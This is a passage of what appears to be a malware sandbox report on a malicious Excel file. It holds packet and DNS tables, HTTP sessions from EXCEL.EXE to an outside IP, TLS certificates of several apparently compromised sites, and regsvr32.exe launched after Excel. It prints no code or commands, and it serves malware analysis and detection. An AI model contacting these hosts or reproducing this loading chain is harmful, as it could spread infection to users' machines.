Apr 9, 2021 16:50:34.256144047 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256186962 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256208897 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256257057 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256568909 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256637096 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256716013 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256762981 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256782055 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256813049 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256829977 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256877899 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256880045 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256958008 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256966114 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.257000923 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.257024050 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.257040024 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.257071972 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.257117033 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407115936 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407176018 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407212973 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407250881 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407286882 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407296896 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407336950 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407337904 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407344103 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407349110 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407352924 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407381058 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407401085 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407418966 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407445908 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407505035 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407632113 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407684088 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407726049 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407743931 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407757998 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407804012 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407902956 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407949924 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.407973051 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.407989979 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408015966 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408026934 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408051968 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408066034 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408102989 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408106089 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408185005 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408193111 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408215046 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408240080 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408276081 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408279896 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408298016 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408328056 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408341885 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408368111 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408406019 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408411026 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408443928 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408458948 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408479929 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408480883 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408519030 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408525944 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408556938 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408618927 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408627033 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408655882 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408670902 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408699989 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408718109 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408736944 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408757925 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408777952 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408832073 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408849001 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.408946991 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408986092 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.408989906 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.418193102 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.568842888 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.590106964 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:34.750567913 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:34.750859022 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:34.751358986 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:34.911560059 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:34.915158033 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:34.915210009 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:34.915242910 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:34.915350914 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:34.923973083 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:35.104022980 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:35.104186058 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:35.104717016 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:35.305495977 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:35.650815010 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:35.651103020 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:35.651237011 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:35.651632071 CEST | 49708 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:50:35.673151016 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:35.811692953 CEST | 443 | 49708 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:50:35.845802069 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:35.846585035 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:35.847043037 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.019639015 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.019696951 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.019747019 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.019881010 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.019913912 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.019973993 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.020080090 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.020092964 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.020098925 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.020798922 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.020885944 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.056240082 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.229962111 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.230072975 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.230906010 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.444119930 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500637054 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500673056 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500819921 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.500885963 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.501151085 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.673624992 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 9, 2021 16:50:16.130734921 CEST | 53784 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:16.143492937 CEST | 53 | 53784 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:17.079971075 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:17.106506109 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:18.383769035 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:18.402434111 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:19.236852884 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:19.250278950 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:19.898830891 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:19.912182093 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:27.631143093 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:27.644610882 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:28.624866009 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:28.679160118 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:28.994658947 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:29.030096054 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:30.008637905 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:30.023433924 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:31.024178982 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:31.038847923 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:31.219583988 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:31.232595921 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:31.988054037 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:32.275301933 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:32.457319021 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:32.469917059 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:32.705511093 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:33.006109953 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:33.024477959 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:33.039684057 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:33.403589010 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:33.419395924 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:33.419928074 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:33.436000109 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:34.444114923 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:34.445677996 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:34.460596085 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:34.587918997 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:35.386814117 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:35.399719954 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:35.658883095 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:35.671541929 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:36.463479042 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:36.476281881 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:37.040328979 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:37.080413103 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:37.406884909 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:37.419691086 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:45.245621920 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:45.261970043 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:49.075119972 CEST | 59736 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:49.075345993 CEST | 51058 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:49.076406002 CEST | 52636 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:49.087083101 CEST | 53 | 51058 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:49.088308096 CEST | 53 | 59736 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:49.089103937 CEST | 53 | 52636 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:50.154681921 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:50.167748928 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:51.102541924 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:51.129503012 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:50:53.363485098 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:50:53.376192093 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:04.749984026 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:04.767606020 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:14.443028927 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:14.456430912 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:30.712889910 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:30.727950096 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:37.385668039 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:37.404068947 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:50.858124018 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:50.873991013 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:52.505423069 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:52.518012047 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:51:54.115838051 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:51:54.144412041 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:31.988054037 CEST | 192.168.2.5 | 8.8.8.8 | 0xd9a4 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:32.705511093 CEST | 192.168.2.5 | 8.8.8.8 | 0x4dd1 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:33.419395924 CEST | 192.168.2.5 | 8.8.8.8 | 0x17f7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:34.445677996 CEST | 192.168.2.5 | 8.8.8.8 | 0xf943 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:35.658883095 CEST | 192.168.2.5 | 8.8.8.8 | 0x8f05 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:32.275301933 CEST | 8.8.8.8 | 192.168.2.5 | 0xd9a4 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:33.006109953 CEST | 8.8.8.8 | 192.168.2.5 | 0x4dd1 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:33.436000109 CEST | 8.8.8.8 | 192.168.2.5 | 0x17f7 | No error (0) | 162.251.80.27 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:34.587918997 CEST | 8.8.8.8 | 192.168.2.5 | 0xf943 | No error (0) | 67.222.38.97 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:35.671541929 CEST | 8.8.8.8 | 192.168.2.5 | 0x8f05 | No error (0) | 173.201.252.173 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49702 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:50:32.297149897 CEST | 1201 | OUT | |
Apr 9, 2021 16:50:32.695029020 CEST | 1232 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.5 | 49704 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:50:33.029623985 CEST | 1240 | OUT | |
Apr 9, 2021 16:50:33.410718918 CEST | 1246 | IN |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:33.741060972 CEST | 162.251.80.27 | 443 | 192.168.2.5 | 49706 | CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Apr 9, 2021 16:50:34.915242910 CEST | 67.222.38.97 | 443 | 192.168.2.5 | 49708 | CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Apr 9, 2021 16:50:36.020798922 CEST | 173.201.252.173 | 443 | 192.168.2.5 | 49710 | CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |||||||
CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 16:50:26 |
Start date: | 09/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf50000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:35 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
